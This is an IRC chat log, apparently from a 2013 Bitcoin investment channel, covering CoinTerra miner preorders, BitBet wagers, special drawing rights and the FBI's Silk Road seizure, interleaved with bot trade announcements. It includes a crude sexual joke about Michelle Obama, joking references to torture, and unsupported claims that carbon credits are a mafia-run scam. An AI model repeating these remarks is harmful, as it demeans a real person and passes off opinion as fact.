hours- I also told them the advantages of listing on MPEX Oct 07 20:54:10 3 cointerras ?! how many drinks did you have ? :D Oct 07 20:54:22 anyway, article incoming i trust ? Oct 07 20:55:10 yes and I have access to preferred pricing for interested parties Oct 07 20:55:52 I will put a article in a little while Oct 07 20:55:57 lol you're a distributor nao ? Oct 07 20:56:07 no Oct 07 20:56:14 jborkl: where do you publish your article? Oct 07 20:56:32 bitcoinnews.com - I will put it up in a hour or so Oct 07 20:56:41 ty Oct 07 20:57:23 I asked them why they listed with Pico and not MPEX Oct 07 20:58:14 what'd they say ? Oct 07 20:59:08 What they said made sense, for the US- Pico is a holding co and buys a block from them. You actually buy Pico holding and not Cointerra Oct 07 20:59:31 wait, the listing there is legit? Oct 07 21:00:18 dexX7 im about as amazed myself. Oct 07 21:00:27 yeah https://bitcointalk.org/index.php?topic=307042.0 Oct 07 21:00:38 communication is terrible though Oct 07 21:01:01 ridiculous... Oct 07 21:01:27 tapeout 28nm... so what's this, march ? Oct 07 21:01:39 The listing at Pico is Cointerra, I can tell you that Oct 07 21:01:57 I asked him point blank Oct 07 21:02:07 still ridic Oct 07 21:02:37 They say, shipping is December - Remember I am not promoting or pumping anything- just telling you what I went by and saw Oct 07 21:02:51 thats not why i'm saying it's ridic Oct 07 21:03:03 so do they really plan to mine too? Oct 07 21:03:23 well. i'm still not 100 % convinced. tytus is the one who created the listing, that's no new info, so i'm not surprised that he confirms the listing. Oct 07 21:03:28 because the pico guy said "maybe or maybe not" Oct 07 21:03:33 well that's good, cause I can make a bet,. Oct 07 21:03:41 They said they will have a datacenter in Dallas, TX Oct 07 21:03:53 o wait, they don't sell units ? Oct 07 21:04:03 yes they do Oct 07 21:04:08 they do, and their initial plan was to do only that Oct 07 21:04:17 they will have hosting (3rd party) and selling units Oct 07 21:04:42 mkay. Oct 07 21:05:17 The units I saw (final design I think) has liquid cooling standard - has 2 900 w power supplies and draws at the wall approx 1300 Oct 07 21:05:19 whats their customer protection plan? Oct 07 21:05:27 did not ask that Oct 07 21:05:44 I do not believe on protection plans excpt condoms Oct 07 21:05:56 it's not a matter of belief Oct 07 21:06:19 I did not ask that question Oct 07 21:06:22 https://cointerra.zendesk.com/hc/en-us/articles/200046263-Price-Protection Oct 07 21:06:24 Price Protection – CoinTerra Oct 07 21:06:29 I asked almost everything else Oct 07 21:07:09 not the best plan :/ Oct 07 21:07:27 Chips are supposed to be from (700 grade a to 500 grade d) I assigned the a-d values myself Oct 07 21:07:50 but you can get a better deal, it seems: https://bitcointalk.org/index.php?topic=67547.msg3226890#msg3226890 Oct 07 21:08:24 lol that deal sucks too Oct 07 21:08:33 30% per month? Oct 07 21:08:53 oh, right, I confused thirty and thirteen Oct 07 21:08:55 "I can't wait to see where share price goes once we list on a new exchange, and as we get closer and closer to delivery" Oct 07 21:09:05 I was told the deal I could get, and I think I could do a little better even Oct 07 21:09:50 only one protection plan makes sense, discount = diff increase Oct 07 21:10:08 or hashpower Oct 07 21:10:24 bfl would be bankrupt! Oct 07 21:10:41 shouldnt they be? Oct 07 21:10:53 Im sure theyve drafted notice Oct 07 21:11:04 I'm not sure it would be better for customers - they would get nothing Oct 07 21:11:12 If they actually make this chip, BFL is screwed (like they were not before?) Oct 07 21:11:41 pankkake BFL customers are already in that spot no? Oct 07 21:11:47 many of them Oct 07 21:12:08 the point here isnt to drive the company into the ground Oct 07 21:12:13 yes, still half screwed is better than fully screwed? Oct 07 21:12:20 it's to force them to name a real release date Oct 07 21:12:23 and sell at a real price Oct 07 21:12:44 jborkl: well, they have preorders, so maybe only for new orders Oct 07 21:12:55 [BTCTC] [FN] [DMS.SELLING] 25 @ 0.0041 = 0.1025 BTC [+] Oct 07 21:13:24 maybe customer protection should be provided by a third party Oct 07 21:13:31 how do bfl customers have a prayer ? Oct 07 21:13:40 they ordered when diff was <1% of current Oct 07 21:13:44 how would that work pankkake? Oct 07 21:13:56 [BTCTC] [BITVPS] 111 @ 0.00154979 = 0.172 BTC [+] {3} Oct 07 21:13:59 ya srsly. Oct 07 21:14:21 isnt that just mining diff futures? Oct 07 21:14:41 an insurance type of thing? Oct 07 21:14:52 probably, except not really tied to a hardware release Oct 07 21:14:54 doesnt work in this case Oct 07 21:14:58 [BTCTC] [BASIC-MINING] 40 @ 0.0499 = 1.996 BTC [+] Oct 07 21:14:58 [BTCTC] [PAJKA.BOND] 19 @ 0.01349 = 0.2563 BTC [+] Oct 07 21:15:06 the problem being addresses is that these companies are putting all risks onto the customers Oct 07 21:15:13 addressed* Oct 07 21:15:33 what I have in mind is that the companies finance the thing, but it's a pool; that way customers can feel safe even if the companies go bankrupt Oct 07 21:15:54 and what of the insurance company? Oct 07 21:16:06 they only profit if things ship on time Oct 07 21:16:15 otherwise they die Oct 07 21:16:32 the equation must put risk on the manufacturer Oct 07 21:16:50 the manufacturer pays the insurer, and gets its money back if it ships on time? Oct 07 21:16:52 no escaping that Oct 07 21:17:02 how;s the manufacturer paying the insurer, Oct 07 21:17:03 preorders allow for that risk to be mitigated Oct 07 21:17:09 people themself allow this to happen to themself Oct 07 21:17:11 wjhen 99% of cases manufacturer can't afford a 100 btc bitbet ? Oct 07 21:17:11 yes, the how is an issue :) Oct 07 21:17:24 that'd allow the customers to buy insurance, at a market-established fair premium Oct 07 21:17:31 but... ask them about it. Oct 07 21:17:52 the bet is all-or-nothing though Oct 07 21:17:55 maybe you should work on a better promotion/presentation. it is indeed a good idea, but "wtf is bitbet, why is this relevant" Oct 07 21:17:59 [BTCTC] [BITVPS] 452 @ 0.001589 = 0.7182 BTC [+] {2} Oct 07 21:18:10 it doesnt matter Oct 07 21:18:29 to participate is to put attention on the risk Oct 07 21:18:36 they dont want that Oct 07 21:18:42 since the risk is all yours Oct 07 21:18:58 100btc is nothing Oct 07 21:19:21 doesnt preclude customers from being ripped Oct 07 21:19:33 tat, eta on video of presentation? Oct 07 21:19:52 2 weeks Oct 07 21:20:43 right-o. Oct 07 21:20:59 what can you do if your ETA is really two weeks? say 14 days? Oct 07 21:21:05 2.00001 week? Oct 07 21:21:22 just after soon enough Oct 07 21:21:40 336 hours from now Oct 07 21:21:55 2100 blocks! Oct 07 21:22:42 2016* Oct 07 21:25:05 ;;tslb Oct 07 21:25:09 Time since last block: 3 minutes and 10 seconds Oct 07 21:25:34 im gonna start using blocks as a measure of distance Oct 07 21:25:40 "oh, that's only three blocks away" Oct 07 21:25:51 so here we go : Oct 07 21:25:52 http://bitbet.us/bet/550/cointerra-will-deliver-in-2013/ Oct 07 21:25:54 but the joke will be on you! Oct 07 21:26:03 BitBet - Cointerra will deliver in 2013 Oct 07 21:26:28 the good thing about that rising difficulty, is that now bitcoin = litecoin Oct 07 21:28:40 the only thing litecoin has left going for it is for a major exchange to support it Oct 07 21:28:45 otherwise it's usless Oct 07 21:28:55 it goes down when btc goes up Oct 07 21:28:56 http://bitbet.us/bet/528/activemining-will-be-profitable-for-most-investors/ ?? Oct 07 21:28:58 BitBet - ActiveMining will be profitable for most investors Oct 07 21:29:00 and down when btc goes down Oct 07 21:29:04 this bet is closed? Oct 07 21:29:25 there are some fiat exchanges supporting it. but it's just one step anyway, so why would it change that much? Oct 07 21:29:32 oh Oct 07 21:29:32 nvm Oct 07 21:29:33 "Should btct.co disappear before that date or should proof emerge of btct.co failure to pay any liquid and exigible debt to any investor this bet resolves as No." Oct 07 21:29:34 lol Oct 07 21:29:35 yes Oct 07 21:29:48 eh… that certainly wasn't my intent when creating the bet Oct 07 21:29:59 it was on BitFunder at the time, and still is Oct 07 21:30:16 and I didn't write that text Oct 07 21:30:20 answer will still be No Oct 07 21:30:21 now people are going to be angry at me Oct 07 21:30:22 dont worry Oct 07 21:30:23 dexX7 well cause btctc crapped ouit Oct 07 21:30:50 still a very bad way to handle things Oct 07 21:30:51 yes, i was hasty Oct 07 21:31:02 pankkake welcome to bitbet, a game of unpredictable consequences. Oct 07 21:31:20 let's just put that condition on all bets Oct 07 21:31:34 I regret promoting a bet I didn't specify fully then Oct 07 21:31:43 i suppose it can be remade to reference bitfunder isntead Oct 07 21:31:45 Red Sox will win world series, this bet resolves as No if Bitfunder closes Oct 07 21:31:50 lol Oct 07 21:32:12 and I'm unhappy about *winning*, let's be clear Oct 07 21:32:20 moar like "red sox will win world series, this bet resolves as no if world series doesn't exist anymoar" Oct 07 21:32:32 then you should have read the bet more carefully? Oct 07 21:32:49 ya next time don't win on bets you didn't read carefully. Oct 07 21:32:58 :D Oct 07 21:33:07 no but see, I wrote the bet, except the last part Oct 07 21:33:09 i thought the whole point of btc investing was to profit by mistake? Oct 07 21:33:17 i guess so Oct 07 21:33:23 and that gambling = investing Oct 07 21:33:28 so it's now 5.06 to 0.04 Oct 07 21:33:39 anyone got any confidence at all in cointerra delivering ? Oct 07 21:33:51 didnt CT already say delivery is in Jan? Oct 07 21:34:10 They say, shipping is December - Remember I am not promoting or pumping anything- just telling you what I went by and saw Oct 07 21:34:51 http://cointerra.com/shop/ Oct 07 21:34:53 mircea_popescu: I think they will, but I'm to going vote No as an hedge Oct 07 21:35:06 their own site says Jan Oct 07 21:35:11 pankkake: You don't vote on bets, you bet on them Oct 07 21:35:35 do you have orders on ct, pankkake? Oct 07 21:35:40 kinda Oct 07 21:35:57 TerraMiner II – 1TH/s, Networked ASIC Miner (Early January Batch) Oct 07 21:36:05 this would imply there's an earlier teraminer i neh ? Oct 07 21:36:16 december batches are sold already, as I understand Oct 07 21:36:23 ah i see Oct 07 21:36:28 so there were dec orders? Oct 07 21:36:41 apparently. Oct 07 21:36:49 http://cointerra.com/product/terraminer-iv-2ths/ Oct 07 21:37:02 according to their resume, they are the creme de la creme Oct 07 21:37:28 oh Oct 07 21:37:30 yes. though it isn't everything. and it seems to be their *only* way of saying they're the best Oct 07 21:37:30 my bad Oct 07 21:38:06 well, they are new and have no finished product yet Oct 07 21:38:12 funstuff: http://lasecwww.epfl.ch/keyboard/ Oct 07 21:40:59 asciilifeform does it hold true for metal case ? Oct 07 21:41:22 [MPEX] [S.MPOE] 6600 @ 0.00084194 = 5.5568 BTC [-] {2} Oct 07 21:41:31 yes, unless the latter is 1) grounded 2) has no openings larger than the wavelength in question Oct 07 21:41:53 see: 'Faraday's cage.' Oct 07 21:41:57 yes, they said there were December orders Oct 07 21:42:22 it would be solid, so no openings. Oct 07 21:42:36 solid + grounded works. Oct 07 21:42:47 grounded is actually no good i suspect, Oct 07 21:42:50 antenna effect Oct 07 21:42:53 better to have it POWERED Oct 07 21:43:24 [HAVELOCK] [B] [XBOND] 4630 @ 0.00126881 = 5.8746 BTC [+] {2} Oct 07 21:43:52 power line becomes a potential antenna in that case Oct 07 21:44:08 battery Oct 07 21:44:59 ThickAsThieves: idea is that you want to disperse any excess charge on the case as quickly as possible. Oct 07 21:45:05 or dilute it. Oct 07 21:45:47 it also depends if you're trying to merely keep RF in, or also out. Oct 07 21:46:11 so can kb be made with a "jammer" Oct 07 21:46:39 something that inserts random waves or such Oct 07 21:46:49 i've often thought about cobbling together a keyboard based on pinched optical fibers for the scanning matrix Oct 07 21:46:50 the correct solution is to buy your own acre Oct 07 21:46:55 and shoot anyone that trespasses Oct 07 21:46:59 hehe Oct 07 21:47:13 or something like how noise cancellation works Oct 07 21:49:15 or lead walls Oct 07 21:49:18 what about an all-digital kb? like with an lcd display Oct 07 21:49:23 or such Oct 07 21:50:14 http://www.theverge.com/2013/10/7/4812750/banks-stuff-atms-with-cash-as-debt-ceiling-deadline-looms Oct 07 21:50:22 the next Cyprus btc bubble? Oct 07 21:53:03 http://vigilantcitizen.com/latestnews/pictures-rothschild-family/ Oct 07 21:53:22 i dont get this debt ceiling thing Oct 07 21:53:23 is this what the romanian btc conference will be like? Oct 07 21:53:28 why don't they just raise it to infinity Oct 07 21:53:50 it's not like it matters Oct 07 21:56:23 o yeah, i should do a reminder. Oct 07 21:56:38 [BTCTC] [DMS.MINING] 228 @ 0.00122 = 0.2782 BTC [-] Oct 07 21:56:42 dear peoples : please bear in mind http://trilema.com/2013/the-conference-second-edition/ Oct 07 21:56:42 dafuq is Ven Oct 07 21:56:44 https://bitcointalk.org/index.php?topic=290799.160;topicseen Oct 07 21:56:49 substantial discount if you get your vip seats this year. Oct 07 21:57:06 what two vips and both losers Oct 07 21:57:39 [BTCTC] [FN] [DMS.SELLING] 76 @ 0.00402105 = 0.3056 BTC [-] {2} Oct 07 21:57:39 [HAVELOCK] [AM1] 30 @ 1.27578034 = 38.2734 BTC [-] {8} Oct 07 21:58:05 treehugger coins Oct 07 21:58:18 some hippy shit Oct 07 21:58:18 yeah Oct 07 21:58:23 ven was some hype private currency a while ago Oct 07 21:58:56 was the herp-business nefario was discussing at his pre-sudden death conference Oct 07 21:59:04 that was the "big thing" Oct 07 21:59:23 o yeah i have some backflashes Oct 07 21:59:27 remember ven ? Oct 07 21:59:32 lemme grep. i like to grep. Oct 07 21:59:33 vaugley Oct 07 21:59:44 "The value of Ven is determined on the financial markets from a basket of currencies, commodities and carbon futures." Oct 07 21:59:51 aaaa Oct 07 22:00:20 krakens are retarded :( Oct 07 22:00:38 I'm sure they're only doing it because Ven paid them Oct 07 22:00:42 [HAVELOCK] [AM100] 74 @ 0.01253539 = 0.9276 BTC [-] {8} Oct 07 22:00:51 ok, not retarded but whores, then. Oct 07 22:01:09 Oct 15 04:19:18 i tend to recall this ridiculous Ven thing being a bluechip asset. Oct 07 22:01:13 that's a year ago Oct 07 22:01:43 [HAVELOCK] [AM1] 13 @ 1.25000001 = 16.25 BTC [-] {3} Oct 07 22:01:44 [HAVELOCK] [HIM] 1 @ 0.12999998 BTC [+] Oct 07 22:01:45 [BTCTC] [ASICMINER-PT] 32 @ 1.26612499 = 40.516 BTC [-] {5} Oct 07 22:02:06 Sep 22 04:42:04 nefario i've been perusing with much amusement your summaries of discussions with "lawyers" Oct 07 22:02:06 Sep 22 04:42:06 stick to ven. Oct 07 22:02:12 lmao aww Oct 07 22:02:15 can still trade on btct? Oct 07 22:02:27 Sep 22 03:32:07 Yeah I'm dropping ven Oct 07 22:02:31 can still trade on glbse? Oct 07 22:02:34 ;;seen nefari Oct 07 22:02:34 I have not seen nefari. Oct 07 22:02:35 lol Oct 07 22:02:36 ;;seen nefario Oct 07 22:02:36 nefario was last seen in #bitcoin-assets 1 year, 1 week, 5 days, 23 hours, 2 minutes, and 24 seconds ago: Those assets are not listed or traded anymore Oct 07 22:02:40 here! Oct 07 22:02:41 Sep 22 03:16:18 I don't actually exist Oct 07 22:02:41 Sep 22 03:16:20 just a bot Oct 07 22:02:41 Sep 22 03:16:26 and incidentally, it occurs to me i still don't see your connection to bitcoin. Oct 07 22:02:41 Sep 22 03:16:29 you're a ven developer. Oct 07 22:03:08 Sep 20 17:04:40 kakobrekla: you think Ven is scamconomy? then WTF has bitcoin turned into? Oct 07 22:03:28 Sep 20 16:18:30 >Learn about our historic commodity and carbon credit trades using Ven. Oct 07 22:03:28 Sep 20 16:18:32 omfg Oct 07 22:03:28 Sep 20 16:18:35 green nazi ppl Oct 07 22:03:28 Sep 20 16:19:57 ban carbon credits Oct 07 22:03:34 anyway, that's the gist of it. Oct 07 22:04:34 O_o Oct 07 22:05:23 i still hold dat opinion Oct 07 22:05:53 cause you're stubborn! ven has come such a long way since last autumn Oct 07 22:06:00 its tits sag a little more now! Oct 07 22:06:17 well, carbon credits are a scam. or more exactly, warmists invented carbon credits to profit from their scam :) Oct 07 22:06:31 and then the russian mafia beat them to the punch. Oct 07 22:06:47 [BTCTC] [ASICMINER-PT] 1 @ 1.393 BTC [+] Oct 07 22:06:47 the russian mafia sells carbon credits? Oct 07 22:08:03 kakobrekla actually, 3 losers! list updated. Oct 07 22:09:49 pankkake http://www.epw.senate.gov/public/index.cfm?FuseAction=Hearings.Statement&Statement_ID=b5683930-a655-4fce-8bbf-9b67acec22b5 Oct 07 22:10:53 I don't understand how/why Oct 07 22:11:04 because it's a racket. Oct 07 22:11:08 and rackets are what the mob does. Oct 07 22:11:13 what's to understand ? Oct 07 22:11:38 'when buying & selling are regulated, the 1st thing to be bought'n'sold is the regulators' (ms. rand?) Oct 07 22:11:41 for the record : "A racket is a service that is fraudulently offered to solve a problem, such as for a problem that does not actually exist, will not be affected, or would not otherwise exist." Oct 07 22:11:52 [HAVELOCK] [B] [XBOND] 1641 @ 0.00124 = 2.0348 BTC [-] {2} Oct 07 22:12:20 yes, but then governments are the criminals already, why would the russian mafia sell carbon credits? Oct 07 22:12:57 because the mafia is more efficiently organised, by more determined, better people than any government Oct 07 22:13:05 thus any lucrative racket is taken over from any govt. Oct 07 22:13:36 well, they probably would give me better health insurance, but it isn't happening yet :p Oct 07 22:14:05 anyway, I suppose you know about al gore owning a carbon credit company Oct 07 22:14:36 yeh Oct 07 22:14:55 http://www.theguardian.com/technology/2013/oct/07/fbi-bitcoin-silk-road-ross-ulbricht Oct 07 22:15:08 "warmists" Oct 07 22:15:09 lel Oct 07 22:15:10 >FBI struggles to seize 600,000 Bitcoins from alleged Silk Road founder Oct 07 22:15:31 kakobrekla: read that, heavy lels Oct 07 22:15:33 what do they pay court artists these days? peanuts? Oct 07 22:15:45 tat, lsd sugar cubes Oct 07 22:15:47 apparently Oct 07 22:16:00 lol Oct 07 22:16:06 is that an antenna coming out of his head? Oct 07 22:17:11 "Even if the FBI is not able to transfer the money, merely having possession of the wallet file itself is enough to prevent the coins being spent. The Bureau is in a position equivalent to having seized a safe belonging to a suspect with no idea of the combination – and no hope of forcing it open any other way." Oct 07 22:17:13 i think it's the edge where those two alternate planes of reality meet Oct 07 22:17:25 how retarded are these people ? Oct 07 22:17:29 no hope of forcing it open! Oct 07 22:17:44 i give it a week before the coins vanish Oct 07 22:17:52 any other way than what? Oct 07 22:17:58 [BTCTC] [BASIC-MINING] 20 @ 0.04998 = 0.9996 BTC [+] {2} Oct 07 22:18:07 do we know where they are parked? Oct 07 22:18:10 nobody cancelled rectothermal cryptoanalysis! Oct 07 22:18:10 any other way than with the "combination" Oct 07 22:18:20 kako, we dont know they exist imo Oct 07 22:18:28 "the bureau is in a position equivalent to having snatched copies of michelle obama masturbating on camera Oct 07 22:18:41 even if this does nothing for her, they can certainly jack off in peace" Oct 07 22:18:42 with the lens cap on Oct 07 22:18:59 [MPEX] [S.MPOE] 5900 @ 0.00084331 = 4.9755 BTC [+] {2} Oct 07 22:19:05 you can still hear the squishy noises! Oct 07 22:19:20 sorry Oct 07 22:19:25 and all the other people that have copies can even see it! Oct 07 22:19:36 "The Dixie Mafia is a criminal organization based in Biloxi, Mississippi, and operated primarily in the Southern United States" Oct 07 22:19:42 i just fell over laughing Oct 07 22:22:49 WHOA Oct 07 22:22:51 http://blockchain.info/tx/c99eab8a071d91ce60de038c0d6bff8a51d9f566ef977edc91f6bcf091b7c06f Oct 07 22:22:51 Bitcoin Transaction c99eab8a071d91ce60de038c0d6bff8a51d9f566ef977edc91f6bcf091b7c06f Oct 07 22:23:20 Public Note: Eu sou do Brasil... Eu quero expressar minha opinião sobre a drogas... o governo prende quem vende drogas só por causa que não da lucro para o governo... então acaba com com o cigarro com as bebidas alcoólicas... Oct 07 22:23:48 Public Notice: I'm from Brazil ... I want to express my opinion on drugs ... the government holds those who sell drugs just because they do not profit from the government ... then ends with the cigarette with alcohol ... Oct 07 22:23:49 oh, sorry, that note is attached to the previous tx (0.00012 BTC) Oct 07 22:23:54 lel Oct 07 22:23:56 nevermind Oct 07 22:23:59 oh Oct 07 22:24:04 [MPEX] [S.MPOE] 6550 @ 0.00084353 = 5.5251 BTC [+] Oct 07 22:24:18 i guess they're still transferring coin from sr -> fbi Oct 07 22:24:48 lmao all the people emailing Oct 07 22:24:57 "This seizure was only legal because bitcoin is not recognized as a currency" lol Oct 07 22:25:07 lol it's his AM dividend Oct 07 22:25:49 yeah Oct 07 22:26:00 these comments are about the same caliber as youtube comments Oct 07 22:26:06 pretty much. Oct 07 22:26:21 http://blockchain.info/tx/db3ed0a71adb085df9ef190c20a4fcf36ef8988bff86eeeccd7ed6328aa3381a Oct 07 22:26:22 Bitcoin Transaction db3ed0a71adb085df9ef190c20a4fcf36ef8988bff86eeeccd7ed6328aa3381a Oct 07 22:26:28 nah, the 250btc was the fee for taking the soldering out of his arse for ten minutes. Oct 07 22:26:58 "Evolution did not end with us growing opposable thumbs. You do know that, right? There's another 90 percent of our brains that we have to illuminate." Oct 07 22:27:01 indeed. Oct 07 22:30:53 ;;bc,stats Oct 07 22:30:56 Current Blocks: 262271 | Current Difficulty: 1.8928124928103292E8 | Next Difficulty At Block: 264095 | Next Difficulty In: 1824 blocks | Next Difficulty In About: 1 week, 4 days, 22 hours, 7 minutes, and 3 seconds | Next Difficulty Estimate: 216225003.241 | Estimated Percent Change: 14.23477 Oct 07 22:38:43 oh more KNC fire pics Oct 07 22:38:49 Fire! Fire Oct 07 22:39:11 post! Oct 07 22:39:19 [BTCTC] [BASIC-MINING] 15 @ 0.0504 = 0.756 BTC [+] {3} Oct 07 22:39:21 https://www.youtube.com/watch?v=XchwE9zVdnw Oct 07 22:39:22 Beavis and Butthead - FIRE FIRE! FIRE! FIRE! - YouTube Oct 07 22:39:31 urlpls Oct 07 22:39:51 http://imgur.com/a/HKLWD Oct 07 22:39:51 KnCBurner v2 - Imgur Oct 07 22:40:02 wasn't a miner named bitburner? Oct 07 22:40:06 3rd one I have seen Oct 07 22:40:12 lol yeah Oct 07 22:40:13 pankkake: yup, avalon board by burnin Oct 07 22:40:52 eh thats only a small fire Oct 07 22:41:12 just a fleshwound Oct 07 22:41:16 the 3 pics I have seen - they are all popping in the same spots Oct 07 22:41:18 kik Oct 07 22:41:36 jborkl this is suspicious. if caps bust they should bust moire distributedly. Oct 07 22:41:43 maybe there's an underlying fault in the pmb. Oct 07 22:41:47 tis but a scratch Oct 07 22:43:07 yeah, it is strange that they have done it in the same spot basically- so I would agree there is a common problem and not random failure Oct 07 22:44:09 .tslb Oct 07 22:44:09 61.27 minutes Oct 07 22:44:14 sweet, got my destroyer up and working Oct 07 22:44:19 yeah, over an hour Oct 07 22:44:21 if you want better explosions https://www.youtube.com/watch?v=ssL1DA_K0sI Oct 07 22:44:38 fuck you diff 189 Oct 07 22:44:50 mp what was the name of those notes that govs use to deal in large amounts of money? Oct 07 22:44:53 started with an S Oct 07 22:45:01 i think Oct 07 22:45:04 http://news.slashdot.org/story/13/10/07/1723206/sick-of-your-local-police-force-crowdfund-your-own?utm_source=slashdot&utm_medium=twitter Oct 07 22:45:05 Sick of Your Local Police Force? Crowdfund Your Own - Slashdot Oct 07 22:45:14 inb4 buttcoin IPO for private police Oct 07 22:45:58 oh, nice. i thought this would be about the detroit guy Oct 07 22:46:44 Unlike Kickstarter, the Crowdtilt campaigns don't feature fabulous prizes for contributing; gifting $100, for example, won't entitle you to 'One (1) free "accidental" shooting of your choice.' Oct 07 22:47:04 not even a free anal cavity search? Oct 07 22:47:44 hello everyone! did somesone say free anal cavity search? Oct 07 22:47:56 http://imgur.com/a/hyA3a Oct 07 22:47:57 KNCburner - Imgur Oct 07 22:48:20 http://imgur.com/2UZuUzH Oct 07 22:48:20 imgur: the simple image sharer Oct 07 22:49:35 I burned mine in on testnet Oct 07 22:49:40 lol Oct 07 22:49:51 ThickAsThieves s ?! Oct 07 22:50:54 SDR Oct 07 22:51:04 lol has nothing to do with large amts of money >D Oct 07 22:51:11 nor are they notes. so ftw. Oct 07 22:51:28 special drawing rights are a gold substitute, basically, since nixon. Oct 07 22:51:43 thats the thing Oct 07 22:51:53 i wanted to read up on it better Oct 07 22:52:02 obv my understanding is wrong :) Oct 07 22:53:01 you understand how the fed system works, rgiht ? Oct 07 22:54:10 basically i had no memory of the SDR topic when we last spoke about it, just knew it was something to do with governments Oct 07 22:54:30 but i recall you mentioning how bitcoin could be good for like purposes Oct 07 22:54:56 and i want more arguments as to why bitcoins ultimate use isnt necessarily as a currency to buy coffee Oct 07 22:55:02 mkay. so the fed system works thusly : instead of the various banks shipping bullion back and forth as people deposit/withdraw money, Oct 07 22:55:13 they just re-allocate shares of holdings in these fed mystery boxes Oct 07 22:55:20 which meanwhile are empty, but that doesn't matter. Oct 07 22:55:28 like the ones germany wants to visit Oct 07 22:55:32 but cant Oct 07 22:55:36 this process was very advanced for the 50s, and so it gave an edge to the banks. Oct 07 22:55:47 now, sdrs are an attempt to implement a similar mechanism in international trade, Oct 07 22:56:08 so that countries can just re-allocate their debt to each other through this mechanism Oct 07 22:56:23 it was never fully implemented, and it never worked too well in practice, Oct 07 22:56:50 cheifly because too many cooks involved, and some of them french Oct 07 22:57:26 "The SDR comes to prominence when the US dollar is weak or otherwise unsuitable to be a foreign exchange reserve asset. This usually manifests itself as an allocation of SDRs to IMF member countries. Distrust of the US dollar is not the only stated reason allocations have been made, however." says wiki Oct 07 22:58:17 not really. afaik they were most proeminent due to a sudden liquidity systemic shock caused by the arab hike Oct 07 22:58:21 "China has also suggested the creation of a substitution account to allow exchange of US dollars into SDRs.[Williamson 3] When substitution was proposed before, in 1978, the US appeared reluctant to allow such a mechanism to become operational.[Williamson 4] It is likely just as reluctant today." Oct 07 22:58:23 it was never really important since then Oct 07 22:59:37 so basically the US only likes dealing in financial instruments that don't require provable backing Oct 07 23:00:40 [MPEX] [S.MPOE] 12000 @ 0.00084381 = 10.1257 BTC [+] {2} Oct 07 23:00:43 this is universal. Oct 07 23:00:50 people have been wanting to short mpex for a year, Oct 07 23:00:55 provided they don't have to post any collateral. Oct 07 23:01:17 they would bet, except bitbet requires the actual btc. etc. Oct 07 23:01:32 or sell miners, without taking any risk Oct 07 23:01:51 indeed. Oct 07 23:03:44 [BTCTC] [BASIC-MINING] 10 @ 0.053 = 0.53 BTC [+] Oct 07 23:04:11 sdrs are backed by a basket of other fiats. it's not that much backing in the first place. Oct 07 23:04:26 moreover, as the proportion is fixed, they have all the disadvantages of a bimetallic system, which are marked. Oct 07 23:05:24 now if i recall, your background is in business consulting, why so much finance knowledge? Oct 07 23:05:49 lol the crime iof knowing too much. Oct 07 23:06:37 business consulting doesn't necessarily mean working for small businesses you know. Oct 07 23:06:46 [HAVELOCK] [B] [XBOND] 263 @ 0.00121002 = 0.3182 BTC [-] {3} Oct 07 23:07:16 sure, but your degree of knowledge probably rivals most that are dedicated to the field Oct 07 23:07:48 [HAVELOCK] [B] [XBOND] 251 @ 0.00120817 = 0.3033 BTC [-] {3} Oct 07 23:07:50 as flattering as that may be, knowledge and understanding are sometimes divergent. Oct 07 23:07:56 mircea_popescu: what are the sundry disadvantages of bimetallic systems? Oct 07 23:07:58 anyone can learn what the chess pieces are. Oct 07 23:08:10 true Oct 07 23:08:18 (few can memorize the opening trees, much less play the chaotic variants) Oct 07 23:08:29 benkay_ you have two metals that both work in the same capacity, and you fix an exchange rate between them which you can't easily change. Oct 07 23:08:42 as a result you'll constantly be arbitraged out of value. Oct 07 23:08:49 [HAVELOCK] [B] [XBOND] 286 @ 0.00120005 = 0.3432 BTC [-] {3} Oct 07 23:09:41 if the yen is 11.6675% of a sdr and 11.6672% of the world economy people will short one and long the other somehow. this slowly whittles your holdings towards them. Oct 07 23:10:16 on paper this sounds like nothing at all, but in practice the fabled soros breaking of the bank of england was this, fundamentally. Oct 07 23:10:36 o hey Oct 07 23:10:40 thanks Oct 07 23:11:52 [MPEX] [S.BBET] 2000 @ 0.00059999 = 1.2 BTC [+] Oct 07 23:12:42 TAT, the NeoBee migration to Havelock seems to be going smoothly. Nice work. Oct 07 23:12:53 [MPEX] [S.MPOE] 140 @ 0.00084387 = 0.1181 BTC [+] Oct 07 23:13:54 [BTCTC] [LABCOIN] 5000 @ 0.000165 = 0.825 BTC [-] Oct 07 23:14:43 thx, Havelock made it easy Oct 07 23:14:56 still trying to reach Ukyo... Oct 07 23:15:13 but anyway, back to the point : i didn't use sdrs as an example of the role of bitcoin. Oct 07 23:15:34 i used sdrs as an example of a currency item that can never be bought or held by joe scjhmoe. Oct 07 23:15:41 yet nevertheelss has a nonzero value Oct 07 23:16:42 I see Oct 07 23:17:23 so do you have specific predictions for how btc will be used in your possible future? Oct 07 23:18:07 well yes, take for instance the letter of credit. Oct 07 23:18:09 international remittance seems the next wave Oct 07 23:18:16 something like that. Oct 07 23:18:31 currently if i wish to pay a supplier I must apply to a bank, which may within a month or so issue me a loc, provided Oct 07 23:18:54 the supplier is on the us approved lists of suppluiers that may be paid, and the bank feels like doing it and so on and so forth. Oct 07 23:19:11 or i can just send them 50k btc within a half hour and be done with it. Oct 07 23:19:24 sounda an awful lot like a check Oct 07 23:19:30 sounds* Oct 07 23:20:15 well yes. a loc is basically a large industrial check. Oct 07 23:20:45 they also cost way too much for what they do. Oct 07 23:20:47 more like a cahsier's check i suppose Oct 07 23:20:50 Bitbook raided by the FBI? http://bitstarsite.wordpress.com/2013/10/07/bitbook-raided-one-hour-ago/ Oct 07 23:20:57 more like a certified draft or w.e Oct 07 23:21:06 wtf is a bitbook Oct 07 23:21:12 nice article Oct 07 23:21:13 very popular ?! Oct 07 23:21:28 da fuck i never heard of it ? Oct 07 23:21:32 hang on let me Tineye that image Oct 07 23:21:37 credible news source to boot Oct 07 23:21:59 BITSTARSITELOLKEK Oct 07 23:22:08 sports betting only it seems Oct 07 23:22:20 o hey looky, bootstrap Oct 07 23:22:33 Forbidden (403) Oct 07 23:22:33 CSRF verification failed. Request aborted. Oct 07 23:22:33 You are seeing this message because this HTTPS site requires a 'Referer header' to be sent by your Web browser, but none was sent. Oct 07 23:22:35 herp. Oct 07 23:22:59 url? Oct 07 23:23:20 https://bitcointalk.org/index.php?topic=154995.0 Oct 07 23:23:28 https://bitcointalk.org/index.php?topic=154995.msg3295151#msg3295151 Oct 07 23:23:32 that shit's dope. Oct 07 23:24:04 "NO, IT'S A BAD GOD. THIS IS NOT GOOD... NO 